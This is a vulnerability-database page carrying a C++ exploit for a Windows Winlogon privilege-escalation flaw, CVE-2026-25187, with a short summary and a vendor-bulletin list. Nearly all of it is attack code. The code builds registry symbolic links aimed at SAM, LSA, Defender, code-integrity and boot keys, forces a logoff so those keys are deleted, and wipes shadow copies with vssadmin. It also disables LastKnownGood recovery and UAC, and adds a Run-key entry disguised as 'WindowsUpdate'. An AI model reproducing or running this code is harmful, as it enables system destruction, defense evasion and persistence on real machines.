Vulners
Lucene search
📄 Microsoft WinLogon Registry Deletion / Privilege Escalation
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | CVE-2026-25187 | 10 Mar 202617:04 | – | attackerkb |
 | CVE-2026-25187 | 10 Mar 202616:57 | – | circl |
 | Microsoft Winlogon 后置链接漏洞 | 10 Mar 202600:00 | – | cnnvd |
 | CVE-2026-25187 | 10 Mar 202617:04 | – | cve |
 | CVE-2026-25187 Winlogon Elevation of Privilege Vulnerability | 10 Mar 202617:04 | – | cvelist |
 | EUVD-2026-10659 | 10 Mar 202618:31 | – | euvd |
| EUVD-2026-10660 | 10 Mar 202618:31 | – | euvd |
 | Security information for Hitachi Disk Array Systems | 25 May 202602:39 | – | jvn |
 | March 10, 2026—KB5078734 (OS Build 25398.2207) | 10 Mar 202614:00 | – | mskb |
| March 10, 2026—Hotpatch KB5078736 (OS Build 26100.32463) | 10 Mar 202614:00 | – | mskb |
10
==================================================================================================================================
| # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.
[+] POC :
#include <Windows.h>
#include <comdef.h>
#include <stdio.h>
#include <vector>
#include <string>
#include <map>
#include <thread>
#include <chrono>
#include <sddl.h>
#include <winternl.h>
#include <aclapi.h>
#include <lm.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "netapi32.lib")
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
extern "C" {
NTSTATUS NTAPI NtCreateKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);
NTSTATUS NTAPI NtOpenKeyEx(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG OpenOptions
);
NTSTATUS NTAPI NtSetValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
ULONG TitleIndex,
ULONG Type,
PVOID Data,
ULONG DataSize
);
NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
NTSTATUS NTAPI NtOpenKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
}
class RegistryUtils {
public:
static std::wstring GetUserSid() {
HANDLE hToken = nullptr;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
return L"";
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
std::vector<BYTE> buffer(dwSize);
if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
CloseHandle(hToken);
return L"";
}
PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
LPWSTR lpSid = nullptr;
if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
CloseHandle(hToken);
return L"";
}
std::wstring sid(lpSid);
LocalFree(lpSid);
CloseHandle(hToken);
return sid;
}
static std::wstring RegPathToNative(const std::wstring& path) {
std::wstring regpath = L"\\Registry\\";
if (path.empty() || path[0] == L'\\')
return path;
if (path.find(L"HKLM\\") == 0) {
return regpath + L"Machine\\" + path.substr(5);
}
else if (path.find(L"HKU\\") == 0) {
return regpath + L"User\\" + path.substr(4);
}
else if (path.find(L"HKCU\\") == 0) {
return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
}
else if (path.find(L"HKCR\\") == 0) {
return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
}
return L"";
}
static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
std::wstring nativeSymlink = RegPathToNative(symlink);
std::wstring nativeTarget = RegPathToNative(target);
if (nativeSymlink.empty() || nativeTarget.empty())
return false;
printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
DeleteRegistrySymlink(symlink);
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
HANDLE hKey = nullptr;
ULONG disposition = 0;
ULONG options = INTERNAL_REG_OPTION_CREATE_LINK |
(isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
UNICODE_STRING valueName;
RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
status = NtSetValueKey(hKey, &valueName, 0, REG_LINK,
(PVOID)nativeTarget.c_str(),
nativeTarget.length() * sizeof(WCHAR));
CloseHandle(hKey);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
printf("[+] Symlink created successfully\n");
return true;
}
static bool DeleteRegistrySymlink(const std::wstring& symlink) {
std::wstring nativeSymlink = RegPathToNative(symlink);
if (nativeSymlink.empty())
return false;
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
HANDLE hKey = nullptr;
NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
if (status != 0) {
return true;
}
status = NtDeleteKey(hKey);
CloseHandle(hKey);
return status == 0;
}
static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
HKEY hKey = nullptr;
if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
return false;
}
DWORD index = 0;
WCHAR valueName[256];
DWORD valueNameSize = 256;
while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
RegDeleteValueW(hKey, valueName);
valueNameSize = 256;
index--;
}
index = 0;
WCHAR subKeyName[256];
DWORD subKeyNameSize = 256;
while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
std::wstring fullPath = subKey + L"\\" + subKeyName;
DeleteRegistryTreeManual(rootKey, fullPath);
subKeyNameSize = 256;
index--;
}
RegCloseKey(hKey);
return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
}
};
class WinLogonEoPExploit {
private:
std::wstring m_sessionPath;
std::vector<std::pair<std::wstring, std::wstring>> m_targets;
bool m_persistentMode;
void InitializeTargets() {
m_targets = {
{L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
{L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
{L"security_policies", L"HKLM\\SECURITY\\Policy"},
{L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
{L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
{L"cached_creds", L"HKLM\\SECURITY\\Cache"},
{L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
{L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
{L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
{L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
{L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
{L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
};
}
std::wstring BuildSessionPath() {
DWORD sessionId = 0;
ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
wchar_t path[512];
swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig",
sessionId);
return std::wstring(path);
}
bool PrepareRegistryTarget(const std::wstring& targetPath) {
printf("[*] Preparing target: %ls\n", targetPath.c_str());
std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
if (nativeTarget.empty()) {
printf("[!] Invalid target path\n");
return false;
}
HKEY hKey = nullptr;
std::wstring cleanPath = targetPath;
if (cleanPath.find(L"HKLM\\") == 0) {
cleanPath = cleanPath.substr(5);
}
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
&hKey, nullptr) == ERROR_SUCCESS) {
DWORD dummy = 0xDEADBEEF;
RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD,
(BYTE*)&dummy, sizeof(dummy));
RegCloseKey(hKey);
printf("[+] Target key created/verified\n");
}
return true;
}
bool CreateMaliciousSymlink(const std::wstring& targetPath) {
printf("\n[*] Creating malicious registry symlink...\n");
std::wstring pathWithoutHKLM = m_sessionPath;
if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
pathWithoutHKLM = pathWithoutHKLM.substr(5);
}
RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
printf("[!] Failed to create symlink: %d\n", GetLastError());
return false;
}
return true;
}
bool TriggerLogout() {
printf("\n[*] Triggering user logout...\n");
BOOL result = FALSE;
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
if (result) {
printf("[+] Logout initiated via ExitWindowsEx\n");
return true;
}
result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
5, TRUE, TRUE,
SHTDN_REASON_MAJOR_APPLICATION);
if (result) {
printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
return true;
}
HANDLE hToken = nullptr;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
}
CloseHandle(hToken);
}
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
return result != FALSE;
}
void DisableRecoveryMechanisms() {
printf("[*] Disabling recovery mechanisms...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 1;
RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD,
(BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
}
system("vssadmin delete shadows /all /quiet > nul 2>&1");
}
public:
WinLogonEoPExploit(bool persistentMode = false)
: m_persistentMode(persistentMode) {
InitializeTargets();
}
bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
if (!PrepareRegistryTarget(targetPath))
return false;
if (!CreateMaliciousSymlink(targetPath))
return false;
if (!TriggerLogout()) {
printf("[!] Failed to trigger logout\n");
return false;
}
return true;
}
bool ExploitMultipleTargets() {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - WinLogon EoP Exploit\n");
printf(" Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
m_sessionPath = BuildSessionPath();
printf("[*] Session path: %ls\n", m_sessionPath.c_str());
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (m_persistentMode) {
AddPersistence();
}
DisableRecoveryMechanisms();
printf("\n[*] Available targets:\n");
for (size_t i = 0; i < m_targets.size(); i++) {
printf(" [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
}
printf("\n[*] Targeting all critical keys for maximum impact...\n");
for (const auto& target : m_targets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (CreateMaliciousSymlink(target.second)) {
printf("[+] Symlink created for %ls\n", target.first.c_str());
Sleep(100);
}
}
printf("\n[*] Triggering final logout for mass deletion...\n");
TriggerLogout();
return true;
}
void AddPersistence() {
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
wchar_t path[MAX_PATH];
GetModuleFileNameW(nullptr, path, MAX_PATH);
RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ,
(BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);
printf("[+] Persistence added to HKCU\\Run\n");
}
}
bool CreateMassiveRegistryCorruption() {
printf("\n[*] Creating massive registry corruption...\n");
std::vector<std::wstring> extraTargets = {
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
};
for (const auto& target : extraTargets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
printf("[+] Corruption symlink created for: %ls\n", target.c_str());
Sleep(50);
}
}
return true;
}
};
class PrivilegeEscalation {
public:
static bool DisableUAC() {
printf("[*] Disabling UAC...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 0;
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
printf("[+] UAC disabled (requires reboot)\n");
return true;
}
return false;
}
static bool GrantDebugPrivileges() {
printf("[*] Granting debug privileges...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SECURITY\\Policy\\Privileges",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegCloseKey(hKey);
return true;
}
return false;
}
};
int wmain(int argc, wchar_t* argv[]) {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - Critical EoP Exploit\n");
printf(" WinLogon Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
bool massDeletion = false;
bool persistent = false;
int targetIndex = -1;
for (int i = 1; i < argc; i++) {
if (_wcsicmp(argv[i], L"--mass") == 0) {
massDeletion = true;
}
else if (_wcsicmp(argv[i], L"--persist") == 0) {
persistent = true;
}
else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
targetIndex = _wtoi(argv[++i]);
}
else if (_wcsicmp(argv[i], L"--help") == 0) {
printf("Usage: %s [options]\n", argv[0]);
printf("Options:\n");
printf(" --mass Mass delete multiple critical keys\n");
printf(" --persist Add persistence to startup\n");
printf(" --target N Attack specific target by index\n");
printf(" --disable-uac Disable UAC after deletion\n");
printf("\nWARNING: This exploit will cause system instability!\n");
return 0;
}
}
printf("[!] WARNING: This exploit will delete critical registry keys!\n");
printf("[!] System may become UNBOOTABLE or severely damaged.\n");
printf("[!] Continue? (y/N): ");
wint_t ch = towlower(getwchar());
if (ch != L'y') {
printf("[*] Exploit aborted.\n");
return 0;
}
WinLogonEoPExploit exploit(persistent);
bool success = false;
if (massDeletion) {
printf("\n[*] Running mass deletion mode...\n");
success = exploit.ExploitMultipleTargets();
exploit.CreateMassiveRegistryCorruption();
} else {
printf("\n[*] Available targets:\n");
printf(" 0 - UAC Bypass (Disable UAC)\n");
printf(" 1 - Windows Defender\n");
printf(" 2 - Security Policies\n");
printf(" 3 - LSA Configuration\n");
printf(" 4 - SAM (Password Hashes)\n");
printf(" 5 - Cached Credentials\n");
printf(" 6 - Code Integrity\n");
printf(" 7 - Boot Configuration (DoS)\n");
printf(" 8 - ALL (Mass Deletion)\n");
int choice = targetIndex;
if (choice == -1) {
printf("\n[*] Select target (0-8): ");
wscanf_s(L"%d", &choice);
}
if (choice == 8) {
success = exploit.ExploitMultipleTargets();
} else if (choice >= 0 && choice < 8) {
auto& target = exploit.m_targets[choice];
success = exploit.ExploitSingleTarget(target.first, target.second);
if (choice == 0) {
PrivilegeEscalation::DisableUAC();
}
}
}
if (success) {
printf("\n[+] Exploit triggered! System will logout now.\n");
printf("[*] After login, check if target registry keys are deleted.\n");
Sleep(2000);
} else {
printf("\n[!] Exploit failed. Try running again or use different target.\n");
}
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Apr 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.17.8
EPSS0.00107
SSVC